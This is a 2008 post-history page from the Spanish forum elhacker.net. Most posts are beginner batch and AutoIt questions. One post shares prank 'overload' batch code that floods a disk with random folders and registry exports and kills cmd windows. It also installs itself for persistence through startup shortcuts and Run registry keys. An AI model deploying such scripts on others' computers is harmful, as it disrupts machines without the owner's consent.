elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


  Mostrar Mensajes
Páginas: [1]
1  Programación / Scripting / [Autoit] Loop en: 14 Diciembre 2008, 23:55 pm
Hola amigos, como puedo hacer un loop en AutoIt, asi de sencillo como este en bat



Código
  1. :inicio
  2. cls
  3. echo Hola!!!
  4. goto:inicio
  5.  


Se que es una pregunta bastante basica pero es que no lo encuentro.
Gracias.
2  Media / Juegos y Consolas / Como se llama este juego y de que consola es? en: 16 Noviembre 2008, 00:49 am
 ::) http://www.youtube.com/watch?v=wyF5rquKjas

gracias  ::)
3  Programación / Scripting / Unlocker en: 8 Noviembre 2008, 19:22 pm
Hay un programa que se llama Unlocker http://ccollomb.free.fr/unlocker/ es exelente pero no se puede usar desde una cuenta limitada  :-( (Win XP).

Hay alguna forma de hacer un bat que desbloquee una carpeta o un archivo determinado? (solo que lo desbloquee no que cierre el proceso)


Gracias.
4  Programación / Scripting / Re: Ayuda: AutoIt o nircmd en: 8 Noviembre 2008, 15:30 pm
Ok. gracias
5  Programación / Scripting / Ayuda: AutoIt o nircmd en: 7 Noviembre 2008, 00:03 am
Hola, espero que alguien me pueda ayudar con esta duda

Hay algún comando para deshabilitar ciertas teclas?
quiero que me deshabilite estas 7 teclas:
la tecla Alt
la tecla Enter
la tecla k
y las 4 flechas de dirección

Alguien sabe como se hace?

Leí todo el archivo de ayuda del nircmd pero no encontré info al respecto.

También leí el archivo de ayuda del  AutoIt3 y encontré la función "BlockInput()" pero esta me deshabilita todo el teclado y el mouse.


Antes habia posteado la misma pregunta pero no tube respuestas. Espero que esta vez si las tenga y me puedan ayudar.
Gracias
6  Programación / Scripting / Re: Comandos Nircmd [Utiles para Batch] en: 1 Noviembre 2008, 16:08 pm
Hola, espero que alguien me pueda ayudar con esta duda

Hay algún comando para deshabilitar ciertas teclas?
quiero que me deshabilite estas 7 teclas:
la tecla Alt
la tecla Enter
la tecla k
y las 4 flechas de dirección

Alguien sabe como se hace?

Leí todo el archivo de ayuda del nircmd pero no encontré info al respecto.

También leí el archivo de ayuda del  AutoIt3 y encontré la función "BlockInput()" pero esta me deshabilita todo el teclado y el mouse.


7  Programación / Scripting / bat que produce sonidos en: 3 Octubre 2008, 15:40 pm
Que codigo necesito para que un archivo bat me produzca un sonido (los famosos beeps que produce al iniciar el equipo con la memoria ram mal insertada etc...)

Gracias.
8  Programación / Scripting / ejecutar un archivo despues de X segundos? en: 25 Septiembre 2008, 02:40 am
Lo que quiero hacer es que cuando ejecute el batch este espere un tiempo determinado    para ejecutar otra accion. ¿que comando debo usar?

la idea que tengo es esta:



start archivo.exe
esperar 300 segundos
start archivo2.exe
exit


Gracias de antemano.
9  Programación / Scripting / Re: Sobrecargando Ordenador en: 6 Marzo 2008, 07:42 am
Este archivo lo cree hace como cuatro años cuando estaba leyendo tutoriales para hacerle bromas a mi hermano.

para hacer mis pruebas tube que crear este para cerrar las ventanas del cmd.

Código
  1.  
  2. @echo off
  3. echo KILLING CMD
  4. @echo on
  5. taskkill /F /IM cmd.*
  6. taskkill /F /IM cmd.*
  7. taskkill /F /IM cmd.*
  8. taskkill /F /IM cmd.*
  9. taskkill /F /IM cmd.*
  10. taskkill /F /IM cmd.*
  11.  


En ese tiempo no sabia como hacer un contador que me incrementara un numero asi que creaba archivos y carpetas con numeros aleatorios copiando y pegando en un archivo .bat varios cientos de veces lineas como estas:


Código
  1.  
  2. md %random%%random%%random%%random%%random%%random%
  3. md %random%%random%%random%%random%%random%%random%
  4. reg export HKCU\SessionInformation %random%%random%%random%%random%%random%.reg
  5. reg export HKCU\SessionInformation %random%%random%%random%%random%%random%.reg
  6. reg export HKCU\Console %random%%random%%random%%random%%random%.reg
  7.  



Tambien cree un archivo de instalacion que añadia algunos valores al registro, copiaba los archivos al disco duro y los ejecutaba en el proximo reinicio.

Código
  1. reg import Putadacarpetas\files\machine.reg
  2. reg import Putadacarpetas\files\user.reg
  3. copy Putadacarpetas\files\*.bat "%USERPROFILE%"
  4. copy Putadacarpetas\files\*.bat "%ALLUSERSPROFILE%"
  5. copy Putadacarpetas\files\RUN.lnk "%USERPROFILE%\MenIni~1\Programas\Inicio\"
  6. copy Putadacarpetas\files\RUNA.lnk "%ALLUSERSPROFILE%\Menini~1\Progra~1\Inicio\"
  7.  

RUN.lnk y RUNA.lnk son accesos directos a los que le modifiqué la ruta completa por las variables de sesion %USERPROFILE% etc

Código
  1. Windows Registry Editor Version 5.00
  2.  
  3. [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
  4. "MRunn"="\"%USERPROFILE%\\RUN.bat\""
  5. [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
  6. "URunn"="\"%USERPROFILE%\\Mendes\\RUN.bat\""
  7.  
  8.  


Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines